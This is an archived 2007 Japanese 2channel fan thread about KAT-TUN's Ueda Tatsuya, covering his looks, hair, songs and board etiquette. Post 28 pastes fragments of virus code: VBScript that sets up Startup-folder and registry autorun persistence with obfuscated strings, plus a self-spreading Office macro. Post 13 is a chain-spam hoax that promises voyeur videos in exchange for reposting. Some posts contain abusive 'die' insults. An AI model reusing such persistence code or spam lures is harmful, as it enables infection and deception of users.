2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【KAT-TUN】上田竜也ってマジカッコイイよな part1

1 :たっちゃんカッコええ係:2007/01/21(日) 00:18:37 ID:eGL6A49g
このスレでは、たっちゃんについてオールマイティーに語りあいましょう!!
荒らしはスルーでお願いします。。。
とにかくたっちゃんについて語り合おう!!

2 :たっちゃんカッコええ係:2007/01/21(日) 00:21:56 ID:eGL6A49g
誰か来て〜

3 :ユー&名無しネ:2007/01/21(日) 00:43:30 ID:3PcrfJst
====糸冬 了====

4 :無名アイドルくん :2007/01/21(日) 01:24:16 ID:e8EPQYRj
終了です!!!

5 :かめいじる ◆BO9jeUQEn2 :2007/01/21(日) 01:31:46 ID:KbJQRJhA
かっこいいよね^^

6 :ユー&名無しネ:2007/01/21(日) 01:33:52 ID:vTrK81eH
糸冬 了

7 :ユー&名無しネ:2007/01/21(日) 03:10:28 ID:BdA0lS5f
テラワロス
ロ担だがカクイイは無いわ

8 :ユー&名無しネ:2007/01/21(日) 05:06:44 ID:qy61W6dR
自分も担だがカクイイはないな
ロについて語りたかったらロスレに来ればいいジャマイカ
ただし半年ロムってからおいで

9 :ユー&名無しネ:2007/01/21(日) 09:02:13 ID:1nXaNsX2
そんなヤツいた?

10 :たっちゃんカッコええ係:2007/01/21(日) 10:29:41 ID:sRaU10z7
確かに、見る角度や髪型でキモく見える時もあるけど・・・。
今はカッコイイと思うヨ!!

11 :ユー&名無しネ:2007/01/21(日) 12:33:58 ID:NvETrcyk
たっちゃん萌え(;´д`)


12 :ユー&名無しネ:2007/01/21(日) 14:53:42 ID:BaOUhkU4
新種のイケメンだな
アクアの十座とどっちがカッコイイかな?

13 ::2007/01/21(日) 15:59:02 ID:TD/oPFV+
なんと最近KAT-TUNのカメラマンさんが
KAT-TUNの撮影の着替え中の所や入浴中の所を盗撮したらしいです。
それを今ネットで公開中しています。
このスレを他のところに3つ貼ると、
http://kat-tun.tousatu.net/】にそのページが表示されます。
しなければ「ページが表示されません」になります。
私がやってみたら、本当に見れました。
一番下の「マル秘」を押したら、徹平くんと亀梨くんのヤってる動画が見れました。
試してみてください



14 :ユー&名無しネ:2007/01/21(日) 16:34:00 ID:Ed3ljzFm
ビジュ意識しすぎだなwwwww

15 :ユー&名無しネ:2007/01/21(日) 17:26:57 ID:NvETrcyk
それがまたいい。

16 :かめいじる ◆BO9jeUQEn2 :2007/01/21(日) 20:46:06 ID:KbJQRJhA
化粧濃いけどね^^

17 :ユー&名無しネ:2007/01/21(日) 21:00:27 ID:NvETrcyk
かめいじるさんはたっちゃん好き??

18 :ユー&名無しネ:2007/01/21(日) 21:47:51 ID:qy61W6dR
ロ、顔かわった?
なんかゴツくなった希ガス…
パーマもイヤソ
せめて耳にかけてくれ

19 :ユー&名無しネ:2007/01/21(日) 23:39:57 ID:lJCRSk22
サイドピョンピョンやな
全体に軽いからパーマ違和感

20 :ユー&名無しネ:2007/01/22(月) 22:00:27 ID:4Xchk33r
でも、どんな髪型でもたっちゃんはたっちゃんじゃん。

21 :ユー&名無しネ:2007/01/22(月) 22:28:26 ID:w/AatIrH
でも髪型って大事だぜ
上田ストレートでアッサリな髪型のがイイ

22 :ユー&名無しネ:2007/01/22(月) 23:42:59 ID:zpcpubEC
>20
いやそりゃ髪型でチライになることはないさ
自分はロのキャラがスチだからさ
でもビズは21の意見にドーイだよ

23 :ユー&名無しネ:2007/01/23(火) 00:13:23 ID:5N6x06bg
マジなはなし黒髪で左目隠してサイド巻き巻きは
キャラも伴ってリアルに雰囲気が暗い
なぜあの髪型にこだわるのかトイシメタイ

24 :ユー&名無しネ:2007/01/23(火) 07:46:02 ID:Ao6t7K63
かっこいいっていうより、きれいな顔してるなぁって思う。
肌も白くてきれいそうだし。美しいと思うよ。
彼って性格も良さそうだよねぇ。

25 :ユー&名無しネ:2007/01/23(火) 09:27:57 ID:mL5LYuja
上田ってあの爬虫類みたいなの?
亀梨と赤西以外、
全然名前覚えれない・・・

26 :ユー&名無しネ:2007/01/23(火) 09:31:49 ID:4na6UF4p
色は黒いよ塗りたくってるだけ

27 :ユー&名無しネ:2007/01/23(火) 11:06:30 ID:SKGzBwS+
>25
爬虫類は目

28 :ユー&名無しネ:2007/01/23(火) 18:39:12 ID:4c7U4J5I
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


29 :ユー&名無しネ:2007/01/24(水) 22:40:08 ID:CEvzZ2qp
たっちゃん・・・(;´д`)萌えッ

30 :ユー&名無しネ:2007/01/24(水) 23:37:26 ID:PZBp+JlM
今の髪型 続けて欲しい自分は少数派? かわいくて好きだ

31 :ユー&名無しネ:2007/01/25(木) 21:49:37 ID:FU3Y+DpG
それ言えてる!今の髪型が一番かっこいい

32 :ユー&名無しネ:2007/01/25(木) 22:00:44 ID:UuoU1L6i
イヤ…自分は力の限り変えろと言いたい
オバチャソに見えるんだよorz

33 :ユー&名無しネ:2007/01/25(木) 22:24:26 ID:FU3Y+DpG
じゃ、どんな感じにしてほしい??てかたっちゃんは金ぱ似合わないぞ。

34 :ユー&名無しネ:2007/01/25(木) 22:51:58 ID:iTtMj9mF
海賊帆の時みたいな金パはいいとオモ

35 :ユー&名無しネ:2007/01/25(木) 22:55:29 ID:UuoU1L6i
>33
金髪似合うと思うぞ?
黒髪はキャワ金髪はチレイだた
http://understandabl.img.jugem.jp/20050929_71442.jpg
http://understandabl.img.jugem.jp/20050918_65063.jpg
他担だがこの頃のロにはぐらついたよ
襟足ストレートが良い

36 :ユー&名無しネ:2007/01/25(木) 23:02:13 ID:AY/QhkVQ
ストレートのが可愛いしかっこいい

37 :ユー&名無しネ:2007/01/25(木) 23:08:40 ID:BZiXjwf8
今月の歩誌はストレートだったぞ
ただヘアメイクさぼっただけみたいな感じで微妙だったけど
つか顔が変わってきたね…

38 :ユー&名無しネ:2007/01/25(木) 23:38:15 ID:AY/QhkVQ
どう変わったの?

39 :ユー&名無しネ:2007/01/26(金) 00:40:38 ID:LqVCNEuv
歩誌ってポポロか?

40 :ユー&名無しネ:2007/01/26(金) 02:03:44 ID:nRIfxaFt
>>352枚目キャワイイ

41 :ユー&名無しネ:2007/01/26(金) 02:12:10 ID:CUVfL782
髪型も変えた方がイイと思うけど顔に肉ついてきたのがイクナイ
デブ時の顔と結構違う
個人的に小顔なロが隙なので勿体ない(今も小顔だが

42 :ユー&名無しネ:2007/01/26(金) 18:12:27 ID:Rs8w4849
>35
カワユ杉

43 :ユー&名無しネ:2007/01/26(金) 21:05:04 ID:IQHotYbj
>>35
もっと画像、うpして。

44 :ユー&名無しネ:2007/01/26(金) 23:13:27 ID:nRIfxaFt
上田が歌うと歌が別物になるから好き
言葉よりも大切なものとか

45 :ユー&名無しネ:2007/01/26(金) 23:25:05 ID:IQHotYbj
言えてる!たっちゃんのピカイチの歌唱力はすご杉。

46 :ユー&名無しネ:2007/01/26(金) 23:25:50 ID:IQHotYbj
言えてる!たっちゃんのピカイチの歌唱力はすご杉。

47 :ユー&名無しネ:2007/01/27(土) 09:41:29 ID:qa8b0zGT
確かに(wたっちゃんの歌唱力はすごいよ!

48 :ユー&名無しネ:2007/01/27(土) 11:48:53 ID:M9/5fwwh
歌唱力つか声が良いよね

49 :ユー&名無しネ:2007/01/27(土) 12:02:30 ID:dQ+7pWBl
でも・・・俺、中一なんだけど・・・たっちゃんの評判メッチャ悪いし(涙

50 :ユー&名無しネ:2007/01/27(土) 12:12:31 ID:fQeJjrT0
かなり好き嫌いの分かれる顔だと思う

51 :ユー&名無しネ:2007/01/27(土) 12:26:27 ID:9Rv9HXgn
http://p.pic.to/796wf

52 :ユー&名無しネ:2007/01/27(土) 12:39:24 ID:dQ+7pWBl
まっ中学生にはたっちゃんの良さはわかんないんでしょうね(w

53 :ユー&名無しネ:2007/01/27(土) 13:22:01 ID:dmUOPwwW
>43
自分でヤフー画像から探せよ
と言いつつ
http://n.pic.to/92i16

54 :ユー&名無しネ:2007/01/27(土) 14:17:36 ID:JX2OVZbs
たっちゃんの声ってこもってるけど、たっちゃんの作った歌がすき☆
髪型ゎ今のゎもぅいぃ(>_<)海賊帆の髪色すき(〃▽〃)

55 :ユー&名無しネ:2007/01/27(土) 14:23:56 ID:f5MCD6Uw
たっちゃんてプラ写とかないよね〜

56 :ユー&名無しネ:2007/01/27(土) 14:38:52 ID:dQ+7pWBl
わかんないよぉ〜?(笑)

57 :ユー&名無しネ:2007/01/27(土) 15:23:18 ID:ONJku/U2
たっちゃん!(;´д`)

58 :ユー&名無しネ:2007/01/27(土) 15:29:41 ID:2yC9VUzd
たっちゃんの歌声を聴いたことないな。話した声もね。今度たっちゃんの歌声を聴くのが楽しみだ。

59 :ユー&名無しネ:2007/01/27(土) 15:31:34 ID:ONJku/U2
出来れば、たっちゃんみたいに整形したいぞ。

60 :ユー&名無しネ:2007/01/27(土) 16:17:59 ID:KfZWkgCr
海賊帆あたりが最高だった
正直最近はボクシングのせいか顔がごつくなってきてて
ちょっと複雑なチブンだ

61 :ユー&名無しネ:2007/01/27(土) 16:31:42 ID:Wn0fU8WP
デビューしてから誰担とかはなくてCDとかは買ってたんですケド、最近上田君スキになっちゃったんです。DVD買うならならどれがオススメですか?ドリボは出番少な目ですか?

62 :ユー&名無しネ:2007/01/27(土) 17:13:37 ID:MEHsZtWK
上田要らない。
たらこ唇、女みたいでキモイ。
あんなのがカツンのリーダー
なのが許せない。

63 :ユー&名無しネ:2007/01/27(土) 17:23:19 ID:Qy2TQbm8
674 :ユー&名無しネ:2007/01/27(土) 17:03:42 ID:MEHsZtWK
仁ゎかっこいい。
亀ゎブサ。でやってこれたのに
仁が休業しちゃったから・・・(´Д` )
つか、仁が個人的に大好きで
亀嫌いな人ほとんどだったから
仁無しかツンゎ終わるね。



64 :ユー&名無しネ:2007/01/27(土) 17:24:02 ID:Qy2TQbm8
562 :ユー&名無しネ:2007/01/27(土) 16:43:20 ID:MEHsZtWK
田口キモイ。死ね死ね死ね死ね死ね死ね。
田口ゎいつも自分のことしか考えてない。
自分の好感度を上げる為なら手段を選ばない男。

65 :ユー&名無しネ:2007/01/27(土) 17:36:04 ID:Qy2TQbm8
287 :ユー&名無しネ:2007/01/27(土) 16:50:47 ID:MEHsZtWK
整形しててもしなくてもどっちみち
不細工。黒髪にしてから不細工さが増した。
目が今までファンをもってこれたのゎ
メイクと髪型でブサな顔をごまかしてきたから。




66 ::2007/01/27(土) 20:04:24 ID:Qy2TQbm8
413 :ユー&名無しネ:2007/01/27(土) 16:40:31 ID:MEHsZtWK
多分、目ゎキョンにたかってるんだよ。
それに40のオバと付き合ってれば
お互いいい関係のまま行けるんじゃない?

67 :ユー&名無しネ:2007/01/27(土) 20:59:59 ID:HTYVqArW
いなくてもKAT-TUN成立するっしょ。


68 :ユー&名無しネ:2007/01/27(土) 22:13:15 ID:QF6jVa8J
たっちゃん好き!

69 : ◆Qm648Sjt/U :2007/01/27(土) 22:42:39 ID:C7q381Zo
上田ビジュアル系に行って欲しいww

70 :ユー&名無しネ:2007/01/27(土) 22:53:18 ID:QF6jVa8J
今のままで、いてください!                        

71 :ユー&名無しネ:2007/01/27(土) 22:59:18 ID:fQeJjrT0
ちょっと前ビジュ意識してたっぽいよね?
今が好きだけど

72 :ユー&名無しネ:2007/01/27(土) 23:03:02 ID:QF6jVa8J
前のたっちゃんは、人の真似ばっかしてた。今のたっちゃんが、ちゃんと自分を出せてると思う。よく笑うようになったね。


73 :ユー&名無しネ:2007/01/27(土) 23:11:53 ID:18/xWre5
萌えるぜ。たっちゃん。

74 :ユー&名無しネ:2007/01/27(土) 23:19:14 ID:QF6jVa8J
キュン氏に寸前

75 :ユー&名無しネ:2007/01/27(土) 23:23:37 ID:18/xWre5
たっちゃんが微笑んでる時が一番、萌えます。

76 :ユー&名無しネ:2007/01/27(土) 23:26:45 ID:QF6jVa8J
ホンマ可愛い!!あの笑顔だけで、何でも許してしまいそう・・・そんな自分がコワイ

77 :ユー&名無しネ:2007/01/27(土) 23:33:13 ID:18/xWre5
エッチなことされても??まぁ自分は男子中学生だからどうでもいいが・・。

78 :ユー&名無しネ:2007/01/27(土) 23:35:09 ID:QF6jVa8J
すいません・・・・言い過ぎました・・

79 :ユー&名無しネ:2007/01/28(日) 10:56:54 ID:BAZJfmVn
いやいや、平気だよ(^‐^)b ここは妄想スレなんだしネ。

80 :ユー&名無しネ:2007/01/28(日) 11:19:49 ID:XrJvCiz4
キャバで働いてても、おかしくないよね?

そこらの女より、綺麗やん

81 :ユー&名無しネ:2007/01/28(日) 11:27:18 ID:BAZJfmVn
全然おかしくないよ。

82 :ユー&名無しネ:2007/01/28(日) 12:16:28 ID:j8YcwAT+
ttp://yahoo-award.yahoo.co.jp/
投票よろしくお願いします。

83 :ユー&名無しネ:2007/01/28(日) 13:10:40 ID:BAZJfmVn
http://yahoo-award.yahoo.co.jp/

84 :ユー&名無しネ:2007/01/28(日) 13:17:26 ID:ASIecm6f
タチャーンならなにされてもイイ!!

85 :ユー&名無しネ:2007/01/28(日) 13:24:57 ID:BAZJfmVn
たっちゃんが童貞なワケない。。。

86 :ユー&名無しネ:2007/01/28(日) 14:04:43 ID:Tc3Pwcbf
>61
海賊帆の竜チャンカッコイイよ

87 :ななしじゃにー:2007/01/28(日) 16:19:45 ID:kmUqg3gH
以前は、ガクトの真似っこと思い気に入らなかったけど
最近は・・・・・
未知の可能性を感じられる。
なにか、これっ!というソロのCMなり、脇ドラマなり
ピンでバラエティなりで、一般の私にもわかる個性を見せてもらいたい。

88 :ユー&名無しネ:2007/01/28(日) 17:11:36 ID:ZcL0VAHk
>79
妄想は個人の自由だよね ワラ  ありがd!

89 :ユー&名無しネ:2007/01/28(日) 17:21:25 ID:YZw+aTAO
唇おもろい。

90 :ユー&名無しネ:2007/01/28(日) 17:24:13 ID:ZcL0VAHk
天然キャプテン

91 :ユー&名無しネ:2007/01/28(日) 17:46:24 ID:FsxlR3yw
ここ1年くらい顔太っててイヤーソ
海賊〜一昨年の夏のビズがスチ
ファニーフェイスなんだから清潔感無きゃ駄目だ

92 :ユー&名無しネ:2007/01/28(日) 20:21:40 ID:AF0dgjKI
ウタワラめ!!たっちゃんの生まれた時の写真だせや!!

93 :ユー&名無しネ:2007/01/28(日) 20:26:14 ID:ASIecm6f
たつや<ファンの皆さんおまんじゅうみたいで可愛いと思います

94 :ユー&名無しネ:2007/01/28(日) 20:27:29 ID:AF0dgjKI
僕たちが?

95 :ユー&名無しネ:2007/01/28(日) 21:18:40 ID:ASIecm6f
あ、写真でたね

96 :ユー&名無しネ:2007/01/28(日) 21:32:20 ID:ZcL0VAHk
小さい頃も可愛い!  でも、ウタワラ終わるのは寂しい

97 :ユー&名無しネ:2007/01/28(日) 21:44:53 ID:yjObt8qN
たっちゃんのうるうるしてる目好きやwww

98 :ユー&名無しネ:2007/01/28(日) 21:52:52 ID:ZcL0VAHk
たっちゃんの事が世界一好きです

99 :ユー&名無しネ:2007/01/28(日) 21:54:45 ID:AF0dgjKI
俺、男だから・・・恋愛感情で好きじゃないけど・・・男としての憧れです!!これからも頑張って下さいです。。

100 :ユー&名無しネ:2007/01/28(日) 22:00:19 ID:ZcL0VAHk
憧れてるのかぁww全然良いと思うよ!頑張れ
たっちゃんも頑張れ

101 :ユー&名無しネ:2007/01/28(日) 22:04:08 ID:AF0dgjKI
まっ俺、まだ13歳だし、ジャニーズ目指そうかな?ホントはエイべックスからメジャーデビューを目指してるけど。

102 :ユー&名無しネ:2007/01/28(日) 22:15:35 ID:AF0dgjKI
でもジャニーズはやっぱヤメタ。エイべにしる

103 :ユー&名無しネ:2007/01/28(日) 22:41:19 ID:5kr5k1Pc
おまいみたい優柔不断な奴はどこに行ってもデビューできん以上

104 :ユー&名無しネ:2007/01/28(日) 22:59:52 ID:OWIiw+bV
蛇煮はヤメレ
千菓子にあんな事やこんな事される鴨(w
ヤシは蛇兄サンの秘蔵っ子だからな

105 :ユー&名無しネ:2007/01/28(日) 23:43:16 ID:ASIecm6f
DVDどれがおすすめ?
やっぱり海賊帆?

106 :ユー&名無しネ:2007/01/28(日) 23:46:34 ID:7zObvmGX
海賊は神!だけど神様の泣き顔も捨てがたいよ

107 :ユー&名無しネ:2007/01/29(月) 22:07:40 ID:SLMaLcpd
どんな顔?

108 :ユー&名無しネ:2007/01/29(月) 22:14:54 ID:SLMaLcpd
ど ん な 顔 ?????

109 :ユー&名無しネ:2007/01/29(月) 22:19:36 ID:HtglDMQL
神サマーを見ればわかる

ロは不思議な人って印象だな

110 :ユー&名無しネ:2007/01/29(月) 22:29:56 ID:xs/ykRTS
>>106サンクス
海賊と神サマー注文してみた

111 :ユー&名無しネ:2007/01/29(月) 22:30:17 ID:joyp6n31
神サマーの泣き姿は可愛いすぎる。
でもやっぱり海賊が最高だね。
和服姿が超色っぽい。

112 :ユー&名無しネ:2007/01/30(火) 16:27:26 ID:g9dtYCcN
だね

113 :ユー&名無しネ:2007/01/30(火) 20:12:42 ID:Yw+XYWzI
カツンマニュアル更新してる
今回もかわいいこと

114 :ユー&名無しネ:2007/01/30(火) 20:42:34 ID:4L+L815M
私もマニュアル見ました。
写真写りが悪いのを自らネタにしている彼が好きです。
素で笑いのセンスはあると思う。
もったいないから、もっとテレビとかで喋って欲しい。

115 :ユー&名無しネ:2007/01/30(火) 21:33:17 ID:PK53LSek
可愛いよね

116 :ユー&名無しネ:2007/01/30(火) 21:41:34 ID:JcNSLfF7
たっちゃんサイコー

117 :ユー&名無しネ:2007/01/30(火) 21:58:40 ID:gsAjGW4x
他担だが今回ロのマニュアルはカワユスv
自分のブサを写真写りのせいにしようとしてる所に
切なさがかもし出されてるね
「大丈夫」とかテラモユスvv
ロはそのブサキャワが魅力なんだってことに気づけ

118 :ユー&名無しネ:2007/01/31(水) 00:10:18 ID:9BuyLF/O
新しいガムのCM見れた。
アップでしゃべっとる…。

119 :ユー&名無しネ:2007/01/31(水) 01:26:53 ID:BFtl+FdX
買うかな

120 :ユー&名無しネ:2007/01/31(水) 15:44:39 ID:jW2/43Io
Me to


121 :ユー&名無しネ:2007/01/31(水) 16:10:20 ID:plGQZvM2
海賊の和服とドリボの裸体が眩しすぎマシタ(´д`)

122 :ユー&名無しネ:2007/01/31(水) 16:36:41 ID:ibCFH1N3
普通...

123 :ユー&名無しネ:2007/01/31(水) 17:04:55 ID:pVkRrHX9
人それぞれだからね。別にいいんじゃない

124 :ユー&名無しネ:2007/01/31(水) 17:47:41 ID:BFtl+FdX
海賊みた 神憑りすぎ
別人かと思うほどかっこよかった


125 :ユー&名無しネ:2007/01/31(水) 19:27:43 ID:cuMnWVXS
海賊のたっちゃんヤバス!曲が好き

126 :ユー&名無しネ:2007/01/31(水) 19:59:53 ID:05X4wWJU
>125
曲かい!(w

127 :にゃんちゅう:2007/01/31(水) 20:38:27 ID:EGm6AHi3
なんか、飾らない感じがいいよね(笑)
自分の寝起きの顔が不細工とか普通に言うしね(笑)
俺はナルシじゃなくていかに自分を不細工に見せないかとか何か憎めないっつうか調子のってないけど毒舌?って感じがたまらん(笑)

たっちゃん好きです(笑)

128 :ユー&名無しネ:2007/02/01(木) 01:17:11 ID:a5rzwpST
http://rkg.jp/eh/8322/の新着か着うたってところにあるプレミアムサウンドにKAT-TUNとかジュニアの曲が いっぱいのってるサイトがあったよ!!アルバム曲とかメドレーもあってかなりオススメ☆!私もメドレー曲とって着うた設定してます!

129 :ユー&名無しネ:2007/02/01(木) 01:28:35 ID:CASbfTzK
>127
とりあえずロムりなよ

130 :ユー&名無しネ:2007/02/01(木) 02:46:53 ID:mKiTE3Vz
上田ってあのトカゲみたいな奴?
中性的で気持ち悪い。
キメ顔みたいに、いつも顔傾けてるし。
てか、きまってないし、きもいし。

131 :ユー&名無しネ:2007/02/01(木) 05:00:24 ID:/SFH5EMX
サマリー
祇園祭(だっけか?)
の上田に鳥肌祭デスヨネ

132 :ユー&名無しネ:2007/02/01(木) 05:10:48 ID:/SFH5EMX
あげた上に携帯デス
本気でスマソ

133 :ユー&名無しネ:2007/02/01(木) 16:35:52 ID:s+HP+fhx
ポポロより
上田「マジきもーい中丸きもーい(笑)」
上田「うざーい、うざーい」


134 :ユー&名無しネ:2007/02/01(木) 22:05:46 ID:BnkSip5L
誰かたっちゃんの作詞・作曲した曲うpして〜

135 :ユー&名無しネ:2007/02/01(木) 22:51:13 ID:BnkSip5L
とか言っても、「自分で探せ」とか言われそうだからいいです

136 :ユー&名無しネ:2007/02/01(木) 23:01:22 ID:BnkSip5L
http://jyani-zu.i-lovekhycf

137 :ユー&名無しネ:2007/02/02(金) 00:33:06 ID:gLIxwz3+
ガム買ってしまった。
やっぱり海賊の一番の萌えポイントは、
アンコールの「ノーマター」の時の
笑顔でしょう!(サインボール持ってカメラにお手振り)
>131
あの祇園祭はヤバイですね。
飛び姿が優雅すぎる…。

138 :ユー&名無しネ:2007/02/02(金) 11:03:48 ID:gnTkHAka
>133
ノリが女子高生(w
てか何でココの住民はカタカナ全角の上にゴミ付きで本名連呼してるの…

139 :ユー&名無しネ:2007/02/02(金) 16:36:38 ID:aDQPFyoG
俺もガム買う。

140 :ユー&名無しネ:2007/02/02(金) 17:38:43 ID:IZYlZUdk
一般人よりかは全然かっこいい

141 :ユー&名無しネ:2007/02/02(金) 19:41:45 ID:h07Ogvus
いや、キモイだろ。どう考えても

142 :ユー&名無しネ:2007/02/02(金) 21:26:28 ID:gnTkHAka
担もアンチもまずゴミ全角緑どうにか汁
ロ担=厨の集まりか…orz

143 :ユー&名無しネ:2007/02/02(金) 22:01:17 ID:yyQk8D7K
>137
禿同!だがカタカナは半角で句読点は排除しよう
ついでにメル欄はsageでヨロ

144 :ユー&名無しネ:2007/02/02(金) 22:09:57 ID:KL+1tbkP
仮に顔がキモくても、心はいいよ。

145 :ユー&名無しネ:2007/02/02(金) 22:15:57 ID:spD0Otcc
心いいか?
やる気ないし口だけじゃん

146 :ユー&名無しネ:2007/02/03(土) 00:08:15 ID:rUqWNb1r
口がロに見えた

147 :ユー&名無しネ:2007/02/03(土) 04:59:45 ID:oERtAXhR
たっちゃんかっこいい(*´`)

148 :ユー&名無しネ:2007/02/03(土) 05:25:30 ID:MGlyIkZW
たっちゃんきもすぎ(o>ω<o)

149 :ユー&名無しネ:2007/02/03(土) 09:21:07 ID:83yusA52
たっちゃんはかわいいの

150 :ユー&名無しネ:2007/02/03(土) 11:27:47 ID:qWsdmgMq
たっちゃんは全てがそろった、超イケメンの心優しい人です。

以上


151 :ユー&名無しネ:2007/02/03(土) 13:18:34 ID:qWsdmgMq
荒らし ノシ

152 :かな:2007/02/03(土) 14:09:58 ID:6wKc2Cpa
竜ちゃんわき毛濃いほうだよね?

153 :ユー&名無しネ:2007/02/03(土) 14:43:07 ID:iLy/YUXW
>150
オマイよほどの盲目厨か担ナリかどっちだ?

ゴミと緑とたっちゃん呼びマジで直してくれ
それが出来ない厨は2チャソに来ないで欲しい
ルール守ってるロ担姐さんの恥になる

154 :ユー&名無しネ:2007/02/03(土) 23:04:06 ID:ljPxZzCg
ロ担って何ですか?縁って何ですか?

155 :ユー&名無しネ:2007/02/04(日) 00:38:58 ID:zIOu+FSv
>154
縁バロス…緑!
ロは上田くんの2ネームだよ覚えて栗

156 :ユー&名無しネ:2007/02/04(日) 09:55:57 ID:ASYluYj0
ありがd☆ ロ萌え〜

157 :ユー&名無しネ:2007/02/04(日) 10:42:15 ID:LijIh1IH
ロの彼女は芸能人かな?

158 :ユー&名無しネ:2007/02/04(日) 10:56:21 ID:xBI+PpNA
ここ厨ばっかだな

159 :ユー&名無しネ:2007/02/04(日) 11:03:14 ID:LijIh1IH
↑このコトバの意味はどういう意味?

160 :ユー&名無しネ:2007/02/04(日) 12:00:14 ID:LijIh1IH
どういう意味??

161 :ユー&名無しネ:2007/02/04(日) 14:04:57 ID:kScZdDWB
>>158 の意味は中学生って意味じゃないかな

ちなみにウチはたっちゃんヲタですvvv
ソロ曲とかまぢイイ!!!作詞作曲してるし

162 :ユー&名無しネ:2007/02/04(日) 14:43:30 ID:PnszXSvA
中学生でもルール守れてるヤシはいる
オマイらとりあえずココ読んで勉強汁
http://tv9.2ch.net/test/read.cgi/jr/1152866225/

厳しいようだがオマイらのような厨が多いと
オマイらと同担の姐さんが迷惑するからな

163 :ユー&名無しネ:2007/02/04(日) 14:49:13 ID:hUr1gE/1
ガム買っちゃった。 
たっちゃんは、可愛くもありカッコヨス!!
>>161
ウチもソロ曲スキ!
春コンはどんなソロ曲か楽しみだね

164 :ユー&名無しネ:2007/02/04(日) 16:08:04 ID:5TC1b5CW
ロ担はバカばっかり
死ね

165 :ユー&名無しネ:2007/02/04(日) 16:10:59 ID:PnszXSvA
担ナリ安置としか思え那須

166 :ユー&名無しネ:2007/02/04(日) 17:17:39 ID:zIOu+FSv
>>163
アンカは半角で入れようね

167 :ユー&名無しネ:2007/02/04(日) 20:53:56 ID:2UZ/wUAD
てかこの中で、中学生の女子いる?

168 :ユー&名無しネ:2007/02/04(日) 21:58:08 ID:2UZ/wUAD
いないかぁ〜

169 :ユー&名無しネ:2007/02/04(日) 22:31:02 ID:xBI+PpNA
たっちゃん呼びをまずヤメレ
あとちゃんとsgaeてくれ

170 :ユー&名無しネ:2007/02/04(日) 22:34:42 ID:2UZ/wUAD
sgaeって何ですか?

171 :ユー&名無しネ:2007/02/04(日) 22:41:20 ID:oFBPoaMC
>170
分かってて言ってるようにしか見えない

172 :ユー&名無しネ:2007/02/04(日) 22:56:38 ID:2UZ/wUAD
いや、マジでわかんない。。本当の初心者だから。

173 :ユー&名無しネ:2007/02/04(日) 23:23:53 ID:zIOu+FSv
メール欄に半角でsageと入れるんだよ
あと「。」←句読点は付けないのがルール

174 :ユー&名無しネ:2007/02/05(月) 00:17:38 ID:o3xv4Nfp
>166
ハイパーもNG
>は一つでヨロ

>172
初心者なら何故「初心者スレ」に行かない?
162の姐さんがワザワザ張りつけてくれてるだろうが
sageの話も以前出てる
ココじゃ自己厨も教えてチャソも嫌われる
それでも親切に教えてもらえるのはロ担姐さんが優しいのと
こんなに厨が多いと同担姐さんの質を落としかねるからだ
ココで担名乗りするなら最低限のマナー身につけろ
・メール欄にsage
・>は一つ
・カタカナ半角
・句読点とる
・たっちゃん×→ロ(半角)
・2チャソ用語をロムって学べ

さて
これだけ言って分から那須なら担ナリ安置と限定してイイですよね(゚∀゚)

175 :ユー&名無しネ:2007/02/05(月) 00:24:21 ID:o3xv4Nfp
限定→断定

176 :ユー&名無しネ:2007/02/05(月) 02:00:01 ID:V1dWVUP5
ロ担に厨が多いのなんか他担は前から分かってた事ですから
別に今更気になりませんよ?どうぞご自由に

177 :ユー&名無しネ:2007/02/05(月) 03:36:01 ID:sIj03Lv+
最近お顔が丸くなられましたな

178 :ユー&名無しネ:2007/02/05(月) 19:52:39 ID:lELAwtQ9
>176
ワザワザこんな所まで足を運んでくれてワザワザ書き込んでくれてd
心の広い他担姐さんで感動しま舌(w

179 :ユー&名無しネ:2007/02/05(月) 22:28:30 ID:+5NgdCE8
やはり2チャソはいい人ばっかだな

180 :ユー&名無しネ:2007/02/05(月) 23:46:57 ID:+5NgdCE8
↑ こんな感じでいいんですよね?

181 :ユー&名無しネ:2007/02/06(火) 00:22:51 ID:KIWOYN/D
>180
まずsageなされw
数字も半角でヨロ

182 :ユー&名無しネ:2007/02/06(火) 01:45:22 ID:Ue4b9N3F
>181
つ(

183 :ユー&名無しネ:2007/02/06(火) 02:49:56 ID:KIWOYN/D
>182
d
つ(w

184 :ユー&名無しネ:2007/02/06(火) 10:00:15 ID:t9pr0gMr
たっちゃんまじかっこいい!
可愛い

185 :ユー&名無しネ:2007/02/06(火) 10:29:54 ID:yOx9C4B9
>>1
それはねーよ

186 :ユー&名無しネ:2007/02/06(火) 10:31:54 ID:iHPoyWmN
上田は一番気持ち悪い。

187 :ユー&名無しネ:2007/02/06(火) 11:43:55 ID:t9pr0gMr
一番かっこよくない?ボクシング上手いし

188 :ユー&名無しネ:2007/02/06(火) 11:51:58 ID:t9pr0gMr
あと性格がかっこいいヒ
男らしいよねニ
あと笑い方が高くてあははっていう笑い方が好き!
ラジオで高くあははあははっていう笑い声聞いて好きになりました

189 :ユー&名無しネ:2007/02/06(火) 12:56:53 ID:ZVlClXhi
絵文字も禁止!だよ

190 :ユー&名無しネ:2007/02/06(火) 16:45:57 ID:CxACQbLZ
http://www.debutroad.com/mg/readtitle.cgi?bo=kattun&br=on

KAT−TUNの掲示板は↑↑でももりあがってるよ〜

191 :ユー&名無しネ:2007/02/06(火) 17:08:29 ID:FpK3kK0v
